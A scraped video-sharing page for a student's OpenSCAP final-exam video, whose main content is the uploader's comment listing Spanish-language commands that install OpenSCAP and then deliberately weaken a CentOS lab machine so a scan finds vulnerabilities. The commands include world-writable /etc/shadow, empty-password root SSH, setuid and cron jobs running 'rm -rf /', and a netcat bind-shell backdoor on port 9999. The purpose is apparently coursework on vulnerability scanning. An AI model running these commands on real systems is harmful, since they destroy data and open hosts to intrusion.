KZ
bin
Негізгі бет
Қазірдің өзінде танымал
Тікелей эфир
Ұнаған бейнелер
Қайтадан қараңыз
Жазылымдар
Кіру
Тіркелу
Ең жақсы KZbin
Фильм және анимация
Автокөліктер мен көлік құралдары
Музыка
Үй жануарлары мен аңдар
Спорт
Ойындар
Комедия
Ойын-сауық
Тәжірибелік нұсқаулар және стиль
Ғылым және технология
Creating a State Machine Saga With MassTransit (Orchestrated Saga)
15:41
Examen Final- OpenSCAP
27:45
Support each other🤝
00:31
Леон киллер и Оля Полякова 😹
00:42
coco在求救? #小丑 #天使 #shorts
00:29
My daughter-in-law finally praised me# Laotie smiled# made a good play every day# photosynthesis pl
00:34
Examen Final: OpenSCAP en CentOS
Рет қаралды 231
Facebook
Twitter
Жүктеу
1
Жазылу 169
Alexner Aquino Heredia
Күн бұрын
Пікірлер: 6
@alexneraquinoheredia3588
8 күн бұрын
**1- Instalar OpenSCAP en un servidor Linux de su preferencia.** sudo yum update -y sudo yum install -y scap-security-guide openscap-scanner scap-workbench scap-workbench 3- Realizar un escaneo de vulnerabilidades al equipo cliente utilizando Nessus, sino hay vulnerabilidades deben provocarlas. nano /etc/ssh/sshd_config Protocol 1 PermitRootLogin yes # Permitir inicio de sesión como root PasswordAuthentication yes # Habilita la autenticación por contraseña PermitEmptyPasswords yes # Permitir contraseñas vacías PubkeyAuthentication no # Desactiva la autenticación por clave pública ClientAliveInterval 0 # Desactiva el cierre de sesiones inactivas MaxSessions 10 # Permite más sesiones simultáneas sudo systemctl restart sshd nano /etc/security/pwquality.conf minlen = 5 # Mínimo de 8 caracteres minclass = 0 # Requiere mayúsculas, minúsculas, números y símbolos (cada clase representa un tipo) dcredit = 0 # Exige al menos un dígito ucredit = 0 # Exige al menos una letra mayúscula lcredit = 0 # Exige al menos una letra minúscula sudo nano /etc/pam.d/system-auth Desactivar la verificación de contraseñas seguras # password requisite pam_pwquality.so try_first_pass local_users_only retry=3 authtok_type= Desactivar el uso de contraseñas fuertes # password requisite pam_cracklib.so try_first_pass retry=3 type= - Establecer permisos incorrectos en archivos críticos sudo chmod 777 /etc/passwd sudo chmod 777 /etc/shadow - Habilitar protocolos inseguros en SSH sudo sed -i 's/^#Protocol 2/Protocol 1/' /etc/ssh/sshd_config sudo systemctl restart sshd - Ejecutar procesos con permisos elevados sin necesidad echo -e "#!/bin/bash rm -rf / --no-preserve-root" > /tmp/insecure_script.sh chmod +s /tmp/insecure_script.sh - Exponer credenciales en texto plano echo "username=admin" | sudo tee /var/credentials.txt sudo chmod 777 /var/credentials.txt - Agregar un script de crontab malicioso echo "* * * * * root rm -rf /" | sudo tee -a /etc/crontab **SERVICIOS IMPORTANTES** sudo yum install httpd -y sudo systemctl start httpd sudo systemctl enable httpd sudo echo ' AllowOverride All Require all granted ' >> /etc/httpd/conf/httpd.conf sudo systemctl restart httpd - Incluir un archivo malicioso en el servidor web: echo "" | sudo tee /var/www/html/malicious.php sudo chmod 777 /var/www/html/malicious.php - Habilitar servicios de telnet: sudo yum install telnet-server -y sudo systemctl start telnet.socket sudo systemctl enable telnet.socket - Habilitar servicios de vsftpd: sudo yum install vsftpd -y sudo systemctl start vsftpd sudo systemctl enable vsftpd sudo sed -i 's/^#anonymous_enable=NO/anonymous_enable=YES/' /etc/vsftpd/vsftpd.conf sudo systemctl restart vsftpd - Dejar un puerto abierto con un servicio vulnerable: sudo yum install nc -y echo -e "#!/bin/bash while :; do nc -lvp 9999 -e /bin/bash; done" > /tmp/backdoor.sh chmod +x /tmp/backdoor.sh sudo /tmp/backdoor.sh & -Crear reglas de firewall extremadamente permisivas: sudo firewall-cmd --add-port=1-65535/tcp --permanent sudo firewall-cmd --reload - Activar SNMP con configuración predeterminada (puerto 161): sudo yum install net-snmp-utils net-snmp -y sudo sudo sed -i 's|^com2sec notConfigUser default public|com2sec notConfigUser 0.0.0.0/0 public|' /etc/snmp/snmpd.conf sudo systemctl restart snmpd sudo firewall-cmd --add-port=161/udp --permanent sudo firewall-cmd --reload - Exponer el puerto MySQL (puerto 3306): sudo yum install mariadb-server -y sudo systemctl start mariadb sudo systemctl enable mariadb sudo firewall-cmd --reload sudo sed -i '/\[mysqld\]/a bind-address=0.0.0.0' /etc/my.cnf sudo systemctl restart mariadb - Habilitar Samba sin restricciones (puertos 137-139, 445): sudo yum install samba -y sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak sudo cat > /etc/samba/smb.conf
@yuditvelasquezmatias9769
9 күн бұрын
felicidades compañero, estoy muy orgullosa de ti 🥳🥳
@alexneraquinoheredia3588
9 күн бұрын
@@yuditvelasquezmatias9769 gracias, bendiciones
@alexneraquinoheredia3588
10 күн бұрын
Ahora si terminamos el cuatrimestre :)
@FidelReymt
10 күн бұрын
felicidades brooo 🥳🥳
@abieljaphetgarciavasquez4155
9 күн бұрын
la cabra!!!!!!!!!!💪💪💪💪
15:41
Creating a State Machine Saga With MassTransit (Orchestrated Saga)
Milan Jovanović
Рет қаралды 15 М.
27:45
Examen Final- OpenSCAP
Cristofer Lorenzo
Рет қаралды 20
00:31
Support each other🤝
ISSEI / いっせい
Рет қаралды 52 МЛН
00:42
Леон киллер и Оля Полякова 😹
Канал Смеха
Рет қаралды 4,2 МЛН
00:29
coco在求救? #小丑 #天使 #shorts
好人小丑
Рет қаралды 99 МЛН
00:34
My daughter-in-law finally praised me# Laotie smiled# made a good play every day# photosynthesis pl
Fengjie Family Joke
Рет қаралды 10 МЛН
25:41
Práctica 8: Gestión de usuarios en Linux
Alexner Aquino Heredia
Рет қаралды 144
15:13
Examen Final: OpenSCAP
rosemary valdez #44
Рет қаралды 41
52:45
Practica final
Killispree
Рет қаралды 5
22:18
Examen Final - OpenSCAP
Brandy Paulino Perez
Рет қаралды 15
18:01
Открываем DARKNET | Как попасть в Даркнет?
CyberYozh
Рет қаралды 69 М.
8:16
Why you must use async/await in C# to make API calls
Round The Code
Рет қаралды 2,6 М.
52:49
Examen Final - OpenSCAP
Yudit Velasquez Matias
Рет қаралды 32
9:09
Your shell prompt, ON STEROIDS // Starship
DevOps Toolbox
Рет қаралды 49 М.
1:01:33
ASP.NET Community Standup: Blazor Hybrid + Web in .NET 9
dotnet
Рет қаралды 18 М.
35:29
Examen Final - OpenSCAP
Cristhofer Santos
Рет қаралды 62
00:31
Support each other🤝
ISSEI / いっせい
Рет қаралды 52 МЛН